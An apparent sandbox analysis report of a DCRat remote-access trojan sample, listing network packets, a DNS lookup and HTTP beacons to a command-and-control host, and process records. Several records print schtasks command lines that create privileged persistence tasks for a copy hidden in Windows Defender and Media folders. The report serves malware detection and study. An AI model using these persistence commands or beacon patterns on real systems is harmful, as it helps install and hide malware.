Jul 27, 2024 13:07:02.765697956 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.769602060 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.769618988 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.769665003 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.770504951 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.770522118 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.770536900 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.770555019 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.770585060 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.774488926 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.774504900 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.774702072 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.775454044 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.775470972 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.775485039 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.775537014 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.779442072 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.779459000 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.779490948 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:02.780306101 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:02.780476093 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.154788971 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.154834032 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.154876947 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.154942989 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.155056000 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.155092001 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.155149937 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.155864000 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.155900955 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.155924082 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.156641006 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.156677008 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.156702995 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.157407999 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.157443047 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.157465935 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.157475948 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.157732964 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.158173084 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.158207893 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.158297062 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.158490896 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.158540010 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.167490959 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.172729015 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.376389980 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.376753092 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.376781940 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.377012014 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.377278090 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.377300024 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.377453089 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.380048037 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.380140066 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.380413055 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.380435944 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.380506992 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.381091118 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.381108999 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.381159067 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.381747961 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.381764889 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.381834984 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.382575035 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.382591009 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.382644892 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.383385897 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.383404016 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.383447886 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.384223938 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.384241104 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.384257078 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.384304047 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.385030985 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.385047913 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.385083914 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.385845900 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.385864019 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.385898113 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.386677027 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.386694908 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.386734009 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.387455940 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.387473106 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.387525082 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.493758917 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.493782997 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.493798971 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.493923903 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.494167089 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.494184017 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.494234085 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.494822025 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.494837999 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.494885921 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.495543957 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.495570898 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.495604038 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.496411085 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.496428013 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.496511936 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.497055054 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.497072935 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.497114897 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.497808933 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.497827053 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.497843027 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.497868061 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.497899055 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.498559952 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.498577118 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.498637915 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.499305964 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.499324083 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.499340057 CEST	80	49730	141.8.192.103	192.168.2.4
Jul 27, 2024 13:07:03.499382019 CEST	49730	80	192.168.2.4	141.8.192.103
Jul 27, 2024 13:07:03.512523890 CEST	49730	80	192.168.2.4	141.8.192.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 13:07:01.933286905 CEST	50530	53	192.168.2.4	1.1.1.1
Jul 27, 2024 13:07:01.944019079 CEST	53	50530	1.1.1.1	192.168.2.4
Jul 27, 2024 13:07:21.544930935 CEST	53	52866	1.1.1.1	192.168.2.4
Jul 27, 2024 13:07:23.216701984 CEST	53	49629	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 13:07:01.933286905 CEST	192.168.2.4	1.1.1.1	0xc6b0	Standard query (0)	a1009608.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 13:07:01.944019079 CEST	1.1.1.1	192.168.2.4	0xc6b0	No error (0)	a1009608.xsph.ru		141.8.192.103	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a1009608.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	141.8.192.103	80	5104	C:\Windows\Media\Sonata\wRRcPdViqk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 13:07:01.954128981 CEST	480	OUT	GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1009608.xsph.ru Connection: Keep-Alive
Jul 27, 2024 13:07:02.639342070 CEST	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 27 Jul 2024 11:07:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Jul 27, 2024 13:07:02.639460087 CEST	1236	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
Jul 27, 2024 13:07:02.639477015 CEST	448	IN	Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
Jul 27, 2024 13:07:02.639878988 CEST	1236	IN	Data Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
Jul 27, 2024 13:07:02.639898062 CEST	1236	IN	Data Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
Jul 27, 2024 13:07:02.640713930 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31 Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div> </div>
Jul 27, 2024 13:07:02.640729904 CEST	1236	IN	Data Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20 Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
Jul 27, 2024 13:07:02.641463041 CEST	1236	IN	Data Raw: 32 38 2e 39 36 37 20 39 37 2e 35 31 36 31 43 31 33 32 2e 36 30 31 20 39 36 2e 33 37 30 34 20 31 33 36 2e 32 33 35 20 39 35 2e 34 31 35 37 20 31 33 39 2e 36 37 38 20 39 34 2e 32 37 43 31 34 30 2e 36 33 34 20 39 33 2e 38 38 38 31 20 31 34 30 2e 32 Data Ascii: 28.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fill="black"/> <path d="M196.866 87.9678C193.232 87.5859 189.598 87.5859 186.155 87.5859C185.008 87.5859 185.008 89.4954 186
Jul 27, 2024 13:07:02.641480923 CEST	1236	IN	Data Raw: 34 2e 30 38 33 20 31 30 39 2e 35 34 37 43 32 38 33 2e 38 39 32 20 31 30 39 2e 37 33 38 20 32 36 30 2e 37 34 39 20 31 32 38 2e 32 36 20 32 35 31 2e 35 36 38 20 31 33 39 2e 37 31 37 43 32 34 37 2e 33 36 20 31 33 37 2e 30 34 33 20 32 34 33 2e 31 35 Data Ascii: 4.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.677 224.217 116.23 215.992 114.129C217.905 107.828 219.244 101.145 220.392 94
Jul 27, 2024 13:07:02.642442942 CEST	1236	IN	Data Raw: 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34 2e 37 33 30 34 20 38 39 2e 31 31 35 20 39 37 2e 39 38 31 39 20 39 30 2e Data Ascii: 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527 129.978 84.7846 136.28C8
Jul 27, 2024 13:07:02.646575928 CEST	1236	IN	Data Raw: 33 20 31 32 36 2e 37 33 32 43 31 30 2e 35 37 33 38 20 31 32 37 2e 33 30 35 20 31 30 2e 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 Data Ascii: 3 126.732C10.5738 127.305 10.5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135
Jul 27, 2024 13:07:03.167490959 CEST	456	OUT	GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1009608.xsph.ru
Jul 27, 2024 13:07:03.376389980 CEST	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sat, 27 Jul 2024 11:07:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Target ID:	0
Start time:	07:06:57
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\QT4aLb3P98.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QT4aLb3P98.exe"
Imagebase:	0xea0000
File size:	1'170'944 bytes
MD5 hash:	1A9C19CD373F9CE0642F18F6965521B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:06:58
Start date:	27/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 11 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
